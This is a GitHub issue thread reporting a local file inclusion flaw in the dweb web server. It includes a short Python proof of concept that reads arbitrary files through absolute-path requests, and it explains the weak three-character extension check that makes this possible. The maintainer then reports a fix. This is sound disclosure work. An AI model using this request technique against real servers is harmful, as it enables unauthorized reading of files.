### ISSUE TITLE
LFI vurnability

### ISSUE THREAD

**Issue by Cotix** [davidsblog/dweb#3]
Files can be accessed using a absolute path with a request like this:
# !/usr/bin/python

import sys, socket
host =  "localhost"

buffer = b"GET //tmp/testtxt HTTP/1.0\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #for Tcpc
s.connect((host,8080))
s.send(buffer)
print(s.recv(1024*1024))
s.close()

Upside is that only files ending with supported file extensions can be read this way. Note the last 3 chars need to match, not the extension. So I was able to execute stuff like /usr/bin/nmap because it ends in map, which is a supported extension.

**Comment by Cotix** [comment]
I meant read, not execute*

**Comment by davidsblog** [comment]
Yeah, but I knew what you meant. Thanks.

**Comment by davidsblog** [comment]
I think that absolute paths can no longer be accessed.  Hopefully this is fixed now.
